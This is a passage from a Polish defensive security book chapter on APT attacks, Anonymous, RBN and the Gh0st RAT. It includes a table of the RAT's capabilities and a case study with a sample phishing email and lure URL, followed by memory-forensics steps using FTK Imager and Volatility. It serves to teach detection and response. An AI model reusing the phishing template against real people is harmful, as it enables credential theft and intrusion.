Kup książkęPoleć książkęRozdziaï 6. CyberprzestÚpstwa i ataki APT
381
z maszynami z Tajwanu (choć nie z Chin). Niektórzy analitycy podważali te dowody,
a zwłaszcza pierwszy z nich, ponieważ zastosowanej techniki używano w algorytmach
w programach osadzonych przynajmniej od końca lat 80. ubiegłego wieku. Wykorzy-
stano ją nawet jako wzorcową metodę programowania NetBIOS-a. Więcej informacji
na ten temat znajdziesz na stronie www.amazon.com/Programmers-Guide-Netbios-
-David-Schwaderer/dp/0672226383/ref=pd_sim_b_1. Omawiane szkodliwe oprogra-
mowanie zostało nazwane Hydraq. Napisano też sygnatury, które pozwalają wykrywać
je w programach antywirusowych.
Luka w przeglądarce Internet Explorer umożliwiła napastnikom automatyczne
umieszczanie na komputerach ofiar trojanów pobierających inne programy, które
wykorzystywały uprawnienia przeglądarki do pobierania i instalowania (oraz kon-
figurowania) trojana z „furtką” — narzędzia RAT (ang. Remote Administration Tool).
RAT umożliwiał napastnikom dostęp do systemu przez szyfrowane połączenie SSL.
Następnie napastnicy przeprowadzili rekonesans sieci, zdobyli dane uwierzytel-
niające z katalogu Active Directory, wykorzystali je do uzyskania dostępu do kom-
puterów i udziałów sieciowych z własnością intelektualną oraz tajemnicami han-
dlowymi, a następnie wyprowadzili te dane. Wszystko to trwało kilka miesięcy, przez
które grupa nie została wykryta. Adresy komputerów, które były źródłem ukierun-
kowanego phishingu i programów pobierających trojany, wskazywały na Tajwan,
natomiast połączenia typu C C (ang. Command and Control) do trojana z „furtką”
pochodziły z dwóch chińskich szkół. Każda z tych szkół była pod pewnymi wzglę-
dami konkurencją dla amerykańskich organizacji, które padły ofiarą ataku (np. dla
firmy Google), jednak nie udało się znaleźć dowodów na to, że akcja była finanso-
wana lub wspomagana przez chiński rząd albo przemysł.
Inne powszechnie opisywane ataki APT, w tym „Night Dragon” z 2010 roku,
„RSA Breach” z 2011 roku i „Shady RAT”, były prowadzone przez kilka lat. Obej-
mowały podobne namierzanie celów. Do przeprowadzenia rekonesansu i wyprowadze-
nia poufnych danych zastosowano ukierunkowany phishing z użyciem e-maili, wyko-
rzystywanie luk w aplikacjach, szyfrowane połączenia i narzędzia RAT z „furtkami”.
Wzorzec ten jest charakterystyczny dla ataków APT. Zwykle są one proste (choć
gdy jest to konieczne, stosuje się zaawansowane techniki), a po udanym włamaniu
napastnicy niewykryci działają przez kilka miesięcy lub lat. Często za źródło ataków
uznaje się Chiny, choć raporty chińskiego rządu i chińskiego oddziału organizacji
CERT wskazują na to, że to właśnie chiński przemysł i rząd najczęściej są celem napast-
ników. Niezależnie od tego, czy ataki są prowadzone z Chin, Indii, Pakistanu, Malezji,
Korei, Zjednoczonych Emiratów Arabskich, Rosji, Stanów Zjednoczonych, Meksyku
czy Brazylii (kraje te podaje się jako źródła połączeń C C w operacjach APT),
w atakach APT utalentowani hakerzy uzyskują dostęp do systemów, a następnie
namierzają i wyprowadzają poufne informacje wykorzystywane w konkretnym celu.
Kup książkęPoleć książkę382
Vademecum hackingu. Skuteczna obrona sieci przed atakami
Grupa Anonymous
Popularność
Łatwość przeprowadzenia
Szkodliwość
Ocena zagrożenia
6
5
7
6
Anonymous to powstała w 2011 roku zaawansowana grupa hakerów, która zade-
monstrowała, że potrafi się zorganizować w celu namierzenia komputerów rządowych
i korporacyjnych oraz złamania ich zabezpieczeń. Grupa ta z powodzeniem przepro-
wadziła ataki przez odmowę usługi na banki, spenetrowała jednostki rządowe (miej-
skie, stanowe, krajowe oraz międzynarodowe) i wykradła poufne dane, a także ujaw-
niła te informacje, co miało bardzo poważne skutki. Przejęte dane dotyczyły m.in.
tożsamości pracowników i menedżerów oraz szczegółów na temat związków między
firmami i agencjami rządowymi.
Anonymous to luźno powiązana grupa (lub zbiór grup) o częściowo pokrywają-
cych się interesach, która potrafi zorganizować się na potrzeby osiągania różnych
celów — od handlowych (ujawnianie kompromitujących szczegółów na temat powią-
zań biznesowych) po społeczne (ujawnianie korupcji lub zakłócanie pracy rządu,
a także ułatwianie i koordynowanie komunikacji oraz działań zainteresowanych
obywateli). Grupa stosuje rozmaite techniki hakerskie, m.in. wstrzykiwanie kodu
w SQL-u, skrypty XSS i wykorzystywanie luk w usługach sieciowych, a także metody
inżynierii społecznej, w tym ukierunkowany phishing i podawanie się za pracowników
firmy (np. pracowników pomocy technicznej) w celu uzyskania danych uwierzytel-
niających. Członkowie grupy są bardzo pomysłowi i skuteczni. Ich głównym celem jest
ujawnianie informacji, a nie zdobywanie dzięki nim przewagi konkurencyjnej lub
korzyści finansowych. Grupa infiltruje też sieci komputerowe, a nawet instaluje
„furtki”, które może w przyszłości wykorzystać.
Ponieważ Anonymous reprezentuje interesy społeczne, celem jej członków jest
pokazanie, że niewielka grupa może mieć duży wpływ przez zakłócanie pracy serwi-
sów lub ujawnianie poufnych informacji. Sukcesy tej grupy są nagłaśniane, a porażki
są niemożliwe do wykrycia. Wynika to z tego, że jej działania są rozproszone i przy-
pominają pracę zautomatyzowanych lub ręcznych skanerów oraz próby penetracji,
na które sieci firmowe są nieustannie narażone.
Zdaniem wielu osób grupa Anonymous nie przeprowadza ataków APT, ponieważ
jej akcje często mają na celu uszkodzenie witryny lub zablokowanie dostępu do serwisu.
Jednak działania te nieraz mają odciągać uwagę od innych operacji. Kilka głośnych
akcji grupy Anonymous wobec agencji rządowych i firm z listy Fortune 500 obejmo-
Kup książkęPoleć książkęRozdziaï 6. CyberprzestÚpstwa i ataki APT
383
wało ataki typu DDoS na witryny (rysunek 6.1) i włamania na komputery połączone
z wyprowadzeniem poufnych informacji. Uzyskane dane często są ujawniane na
publicznych forach i udostępniane dziennikarzom w celu wzbudzenia sensacji.
Rysunek 6.1. Grupa Anonymous wykorzystaïa narzÚdzie LOIC (ang. Low Orbit Ion Cannon)
do przeprowadzenia ataków DDoS na przeciwników serwisu WikiLeaks
RBN
Popularność
Łatwość przeprowadzenia
Szkodliwość
Ocena zagrożenia
5
5
7
6
RBN (ang. Russian Business Network) to grupa przestępcza skupiająca firmy i orga-
nizacje. Wcześniej działała w Sankt Petersburgu, a obecnie dzięki partnerom rozprze-
strzeniła się na wiele innych państw i prowadzi działalność na skalę międzynaro-
dową. Grupa zarządza kilkoma botnetami, które wynajmuje, rozsyła spam, stosuje
phishing, rozpowszechnia szkodliwe oprogramowanie i zajmuje się hostingiem płat-
nych witryn pornograficznych (także z pornografią dziecięcą i z fetyszami). Botnety
zarządzane przez grupę RBN lub powiązane z nią działają w uporządkowany sposób.
Służą do kradzieży tożsamości i środków finansowych oraz wykorzystują bardzo
zaawansowane szkodliwe oprogramowanie do utrwalenia swojej obecności na kom-
puterach ofiar.
Kup książkęPoleć książkę384
Vademecum hackingu. Skuteczna obrona sieci przed atakami
Szkodliwe oprogramowanie stosowane przez RBN jest zwykle bardziej zaawan-
sowane niż narzędzia używane w atakach APT. Oprogramowanie to często służy do
bezpośredniego osiągania celów liderów grupy, a ponadto zapewnia abonentom plat-
formę do prowadzenia innych działań (botnety można wykorzystać np. do przeprowa-
dzenia ataków DDoS i jako systemy pośredniczące w połączeniach w atakach APT).
RBN jest przykładem zorganizowanej działalności przestępczej, jednak nie jest to
jedyna grupa tego typu. Cyberprzestępcy (zarówno stowarzyszeni z RBN, jak i nieza-
leżni) wykorzystują RBN jako model, a ich sieci przez cały 2011 rok ułatwiały ataki
APT innym grupom. Ułatwianie dostępu do przejętych systemów jest przykładem
działań z obszaru APT.
CZYM ATAKI APT NIE Sk?
Równie ważne jak zrozumienie, czym są ataki APT, jest ustalenie, czym one nie są.
Opisane wcześniej techniki są stosowane zarówno w atakach APT, jak i przez innych
napastników, którzy są zainteresowani (często z uwagi na dostrzeżoną okazję) zakłó-
ceniem pracy firmy, sabotażem, a nawet działalnością przestępczą.
APT nie jest ani konkretnym szkodliwym programem, ani zestawem szkodliwego
oprogramowania, ani określoną czynnością. Ataki APT to skoordynowane i szeroko
zakrojone działania, które mają pozwolić osiągnąć konkretny cel (związany z konku-
rencją, finansami, reputacją itd.).
PRZYKADOWE POPULARNE NARZ}DZIA I TECHNIKI
Z OBSZARU APT
Aby opisać ataki APT i sposoby ich wykrywania, w dalszych podpunktach przedsta-
wiamy przykładowe narzędzia i techniki wykorzystane w kilku tego rodzaju atakach.
Atak za pomocÈ narzÚdzia Gh0st
Popularność
9
Łatwość przeprowadzenia 10
9
Szkodliwość
Ocena zagrożenia
9
Narzędzie RAT o nazwie Gh0st, używane w atakach Gh0stnet w latach 2008 –
2010, to znany przykład szkodliwego oprogramowania stosowanego w atakach
APT. 29 marca 2009 roku w serwisie Information Warfare Monitor (IWM;
www.infowar-monitor.net/about/) opublikowano dokument zatytułowany Tracking
Kup książkęPoleć książkęRozdziaï 6. CyberprzestÚpstwa i ataki APT
385
Gh0stNet — Investigation of a Cyber Espionage Network (www.infowar-monitor.net/
research/). Dokładnie opisano w nim szczegółowe badania śledcze związane z atakiem
(i włamaniem) na systemy komputerowe Prywatnego Biura Dalajlamy, tybetańskiego
rządu na uchodźstwie i kilku innych tybetańskich organizacji. Po dziesięciu miesiącach
żmudnych badań zespół utalentowanych „cyberdetektywów” stwierdził, że źródłem
ataków były Chiny, a do włamania do systemów ofiar wykorzystano zaawansowane
szkodliwe oprogramowanie — narzędzie RAT o nazwie Gh0st. Na rysunku 6.2 przed-
stawiono program do wydawania poleceń z tego narzędzia, a w tabeli 6.1 opisano
możliwości Gh0sta. Pora pokrótce omówić jego najważniejsze funkcje.
Rysunek 6.2. Ekran do wydawania poleceñ i sprawowania kontroli w Gh0Ăcie
W poniedziałkowy poranek w listopadzie Charles otworzył swoją skrzynkę
pocztową. Musiał zapoznać się z długą listą e-maili, skończyć jakąś papierkową robotę
i wziąć udział w dwóch spotkaniach w dziale finansów. W trakcie odpowiadania na
wiadomości Charles zauważył, że jedna z nich była zaadresowana do działu finansów.
Dotyczyła pewnej błędnie przeprowadzonej transakcji finansowej. W wiadomości
znajdował się odnośnik do raportu na temat błędu.
Charles kliknął odnośnik, ale zamiast zobaczyć raport, ujrzał białą stronę z tekstem
„Proszę czekać. Ładowanie w toku”. Po zamknięciu przeglądarki Charles ponownie
zajął się pracą i zapomniał o nieudanym transferze pliku. Gdy po spotkaniach wrócił
do biurka, okazało się, że komputer zniknął. Pojawiła się za to notatka od działu bez-
pieczeństwa. Wyjaśniono w niej, że maszyna była źródłem podejrzanych danych.
W międzyczasie zatrudniono śledczego do zbadania tej sprawy i pomocy przy niej…
Kup książkęPoleć książkę386
Vademecum hackingu. Skuteczna obrona sieci przed atakami
Funkcja
Usuwanie istniejących rootkitów
Menedżer plików
Kontrolowanie ekranu
Eksplorator procesów
Rejestrator wciśnięć klawiszy
Zdalny terminal
Przechwytywanie sygnału z kamery
Śledzenie dźwięku
Łamanie kont z dostępem
wdzwanianym
Zdalne wygaszanie ekranu
Zdalne blokowanie urządzeń
wejścia
Zarządzanie sesją
Zdalne pobieranie plików
Opis
Usuwanie z tablicy SSDT (ang. System
Service Descriptor Tables) wszystkich
istniejących „haków”
Kompletny menedżer plików z hostów
lokalnych i zdalnych
Pełna kontrola nad zdalnym ekranem
Kompletna lista wszystkich aktywnych
procesów i otwartych okien
Rejestrowanie wciśnięć klawiszy na zdalnym
komputerze (w czasie rzeczywistym
i w trybie offline)
Zdalna powłoka ze wszystkimi funkcjami
Przekaz na żywo sygnału z kamery
(jeśli jest dostępna)
Przekaz na żywo dźwięku z zainstalowanego
mikrofonu (jeśli jest dostępny)
Wyświetlanie kont (wraz z hasłami)
mających dostęp wdzwaniany
Wygaszanie ekranu na przejętym hoście
(komputer staje się bezużyteczny)
Blokowanie myszy i klawiatury
w przejętym hoście
Zdalne zamykanie i ponowne uruchamianie
hosta
Możliwość pobierania plików binarnych
z internetu na zdalny host
Konfigurowalne ustawienia serwera
w niestandardowym pliku binarnym
Tworzenie niestandardowego
serwera Gh0st
Tabela 6.1. MoĝliwoĂci Gh0sta (dziÚki uprzejmoĂci Michaela Spohna z Foundstone Professional
Services)
Kup książkęPoleć książkęRozdziaï 6. CyberprzestÚpstwa i ataki APT
387
Szkodliwe e-maile
Po rozmowie z Charlesem i wieloma innymi osobami stało się jasne, że każdy z pra-
cowników kliknął adres URL z e-maila. Na szczęście była dostępna treść wiadomości.
Od: Jessica Long [mailto:administrateur@hacme.com]
Wysłano: Poniedziałek, 19 grudnia 2011, 09:36
Do: US_ALL_FinDPT
Temat: Nieudana transakcja bankowa
Komunikat został wysłany w związku z płatnością bankową nr 012832113749
wysłaną niedawno z Pana konta.
Obecny status transakcji to: „nieudana z powodu błędu technicznego”. Prosimy
zapoznać się z poniższym raportem w celu uzyskania dodatkowych informacji:
http://finiancialservicesc0mpany.de/index.html
Z poważaniem
Jessica Long
Stowarzyszenie Płatności Elektronicznych — dbamy o bezpieczeństwo Waszych
transakcji
W trakcie analizowania e-maili śledczych zdziwiło, że firma z siedzibą w Stanach
Zjednoczonych używała niemieckiego adresu URL (z przyrostkiem .de) do dostar-
czania raportów na temat nieudanych transakcji finansowych. Następny krok polegał
na szukaniu śladów w nagłówkach e-maila.
US_ALL_FinDPT @commercialcompany.com ; Mon, 19 Dec 2011 09:36:07
Received:EmailServer_commcomp.comt (x.x.x.x.) by
ObiWanbmailplanet.com (10.2.2.1) with Microsoft SMTP Server id
10.1.1.1; Mon, 16 Dec 2011 09:35:21
Received: from unknown (HELO arlch) ([6x.8x.6x.7x]) by
ObiWanmailplanet.com with ESMTP; Mon, 19 Dec 2011 09:34:19
Za pomocą zapytań WHOIS oraz narzędzi Robtex Swiss Army Knife Internet Tool
(www.robtex.com) i PhishTank (www.phishtank.com) śledczy odkrył, że adres IP
pochodził z Niemiec i znajdował się na kilku czarnych listach adresów używanych
do rozsyłania spamu.
Oznaki wïamania
Szkodliwe oprogramowanie niezależnie od tego, czy jest używane w atakach APT, czy
w standardowy sposób, powinno przetrwać ponowne uruchomienie systemu. Wyko-
rzystuje się do tego różne mechanizmy:
Kup książkęPoleć książkę388
Vademecum hackingu. Skuteczna obrona sieci przed atakami
x rozmaite węzły Run w rejestrze,
x tworzenie usług,
x podłączanie się do istniejących usług,
x wykorzystanie zaplanowanych zadań,
x ukrywanie komunikacji jako normalnego ruchu,
x zastępowanie głównego rekordu rozruchowego,
x zastępowanie BIOS-a systemu.
W trakcie analiz podejrzanego systemu śledczy posługują się technikami badaw-
czymi i procedurami reagowania na incydenty. Właściwy sposób reagowania na incy-
denty jest oparty na stopniu zmienności danych, co opisano w dokumencie RFC 3227
(ietf.org/rfc/rfc3227.txt). Podano w nim kolejność, w której należy zbierać dowody.
Związana jest ona ze zmiennością danych.
x Pamięć.
x Plik stronicowania lub wymiany.
x Informacje o działających procesach.
x Dane dotyczące sieci, np. porty oczekujące na pakiety lub istniejące połączenia
z innymi systemami.
x Rejestr systemu (jeśli istnieje).
x Pliki dzienników systemowych lub aplikacji.
x Obraz dysków utworzony na potrzeby analiz.
x Nośniki ze zarchiwizowanymi danymi.
Aby zbadać maszynę, do której się włamano, przygotuj pakiet różnych narzędzi.
W trakcie analiz ważne jest to, żeby nie zniszczyć dowodów. Narzędzia stosowane
przy reagowaniu na incydenty należy skopiować na płytę CD i zewnętrzne nośniki
pamięci masowej. W omawianej sytuacji analitycy wykorzystali narzędzia z pakietu
Sysinternals i narzędzia do zastosowań śledczych:
x AccessData FTK Imager,
x Sysinternals Autoruns,
x Sysinternals Process Explorer,
x Sysinternals Process Monitor,
x WinMerge,
x Currports,
x Sysinternals Vmmap.
Uwaga
Waĝne jest to, ĝe te narzÚdzia zapisane na pïycie CD potrafiÈ dziaïaÊ samodzielnie.
Kup książkęPoleć książkęRozdziaï 6. CyberprzestÚpstwa i ataki APT
389
Rejestrowanie zawartoĂci pamiÚci
Gdy badania przeprowadza się zgodnie z poziomem zmienności danych, należy za-
cząć od wykonania zrzutu pamięci z zaatakowanego komputera i wyeksportować
go do zewnętrznego urządzenia z pamięcią masową. Zrzut może przydać się do analiz
szkodliwego oprogramowania prowadzonych za pomocą narzędzia Volatility Frame-
work Tool. W programie FTK Imager wybierz opcję File/Capture Memory, czego efekt
pokazano na rysunku 6.3. Wskaż zewnętrzne urządzenie z pamięcią masową jako ka-
talog wyjściowy, nadaj zrzutowi nazwę podobną do nazwazainfekowanejmaszyny.mem
i kliknij przycisk Capture Memory, żeby wykonać zrzut.
Rysunek 6.3. Tworzenie migawki pamiÚci zainfekowanego systemu
Analizy pamięci mają miejsce po zebraniu wszystkich dowodów. Dostępnych
jest kilka narzędzi do analizowania pamięci — m.in. FDPro i Responder Pro firmy
HBGary, Mandian Memoryze i The Volatility Framework (www.volatilesystems.com/
default/volatility). Każde z nich potrafi wyodrębnić z migawek pamięci związane
z procesami dane, np. wątki, łańcuchy znaków, zależności i połączenia. Wspomniane
narzędzia służą do analizy migawek pamięci, a także powiązanych plików systemu
operacyjnego Windows (Pagefile.sys i Hiberfil.sys). Analizy pamięci są bardzo istotnym
aspektem badań ataków APT, ponieważ wiele narzędzi i metod stosowanych przez
napastników jest opartych na wstrzykiwaniu kodu do procesów i innych technikach
Kup książkęPoleć książkę390
Vademecum hackingu. Skuteczna obrona sieci przed atakami
zaciemniania. Jednak analiza pamięci pozwala poradzić sobie z tymi sztuczkami,
ponieważ pliki i połączenia muszą zostać odszyfrowane w korzystających z nich pro-
cesach systemu operacyjnego.
Uwaga
Ciekawe jest znakomite omówienie krok po kroku analiz pamiÚci trojana R2D2 (nazywanego teĝ
Bundestrojanem; uĝyto go w sïynnym ataku APT omawianym w mediach w Niemczech w 2011 roku).
Znajdziesz je na stronie www.evild3ad.com/1136/volatility-memory-forensics-federal-trojan-aka-r2d2/.
Plik stronicowania (wymiany). Pamięć wirtualna używana przez system operacyjny
Windows jest przechowywana w pliku Pagefile.sys, który znajduje się w głównym
katalogu dysku C:. Gdy pamięć fizyczna zostaje wyczerpana, system w razie potrzeby
wymienia pamięć procesów. Plik stronicowania może zawierać cenne informacje
na temat infekcji szkodliwym oprogramowaniem lub ukierunkowanych ataków.
Także plik Hyberfil.sys obejmuje dane z pamięci, zapisywane po przejściu systemu
w stan hibernacji. Analitycy mogą znaleźć tu dodatkowe dane. Plik ten standardo-
wo jest ukryty i używany przez system operacyjny.
Za pomocą narzędzia FTK Manager można skopiować wspomniane pliki do urzą-
dzenia z dowodami, co pokazano na rysunkach 6.4 i 6.5. Po kliknięciu pliku stroni-
cowania prawym przyciskiem myszy można go wyeksportować na takie urządzenie.
Warto pamiętać, że lepiej jest utworzyć obraz dysku zainfekowanego lub podejrzanego
komputera, jednak nie zawsze jest to praktyczne rozwiązanie. Wtedy plan reago-
wania na incydenty (taki jak opisany w tym rozdziale) pomaga zebrać ważne dane
i artefakty, przydatne do powstrzymania i pozbycia się napastników oraz zareagowa-
nia na ich działania. Przydatny proces analizowania zapisanych plików z zawartością
pamięci opracowano w ramach projektu The Sandman Project (sandman.msuiche.
net/docs/SandMan_Project.pdf).
Rysunek 6.4. Zapisywanie plików z zawartoĂciÈ pamiÚci w aktywnym systemie
Kup książkęPoleć książkęRozdziaï 6. CyberprzestÚpstwa i ataki APT
391
Rysunek 6.5. Eksportowanie pliku pagefile.sys
Analizowanie pamiÚci. Do analizowania plików ze zrzutem pamięci można zastosować
wspomniane wcześniej oprogramowanie o otwartym dostępie do kodu źródłowego —
The Volatility Framework Tool. Najpierw należy zidentyfikować obraz:
$ python vol.py -f /home/imegaofmemdump.mem imageinfo
Następnie trzeba pobrać procesy:
$ python vol.py -f /home/imegaofmemdump.mem pslist
Teraz można sprawdzić połączenia sieciowe:
$ python vol.py -f /home/imegaofmemdump.mem connscan
Kup książkęPoleć książkę392
Vademecum hackingu. Skuteczna obrona sieci przed atakami
Jak widać,
Pobierz darmowy fragment (pdf)